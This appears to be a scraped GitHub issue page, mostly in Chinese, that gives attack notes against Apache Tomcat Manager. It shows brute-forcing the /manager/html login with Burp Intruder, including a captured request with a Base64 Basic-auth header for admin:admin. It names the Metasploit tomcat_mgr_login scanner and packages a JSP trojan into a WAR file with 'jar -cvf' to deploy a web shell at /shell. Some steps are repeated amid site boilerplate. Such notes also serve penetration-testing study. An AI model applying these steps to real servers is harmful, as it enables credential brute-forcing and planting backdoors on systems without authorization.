We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
访问http://host:port/manager/html
http://host:port/manager/html
Burp抓包进行暴力破解
查看请求包,发现将输入的账号、密码重新编码为Base64密文:用户名:密码 > admin:admin > YWRtaW46YWRtaW4=
用户名:密码 > admin:admin > YWRtaW46YWRtaW4=
GET /manager/html HTTP/1.1 Host: 192.168.100.17:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://192.168.100.17:8080/ Connection: close Cookie: JSESSIONID=C415245CC7B4597217A5869528EFB776 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4=
发送至Intruder模块,标记暴力破解变量(YWRtaW46YWRtaW4=),选择攻击类型(Sniper)
Payload设置,类型选择Custom iterator自定义迭代器,设置三个迭代payload分别代表:用户名 : 密码
Custom iterator
payload
用户名
:
密码
用户名攻击载荷设置
:攻击载荷设置
密码攻击载荷设置
设置编码器(Base64)
取消勾选
进行爆破
use auxiliary/scanner/http/tomcat_mgr_login
The text was updated successfully, but these errors were encountered:
在*.\Java\jdk1.8.0_102\bin目录下执行命令:jar -cvf [war包名称].war [木马名称].jsp,生成war包
*.\Java\jdk1.8.0_102\bin
jar -cvf [war包名称].war [木马名称].jsp
点击上传,上传成功后显示路径:/shell
/shell
Sorry, something went wrong.
No branches or pull requests
BurpSuite
访问
http://host:port/manager/html
Burp抓包进行暴力破解
查看请求包,发现将输入的账号、密码重新编码为Base64密文:
用户名:密码 > admin:admin > YWRtaW46YWRtaW4=
发送至Intruder模块,标记暴力破解变量(YWRtaW46YWRtaW4=),选择攻击类型(Sniper)
Payload设置,类型选择
Custom iterator
自定义迭代器,设置三个迭代payload
分别代表:用户名
:
密码
设置编码器(Base64)
取消勾选
进行爆破
工具/脚本
Metasploit
use auxiliary/scanner/http/tomcat_mgr_login
The text was updated successfully, but these errors were encountered: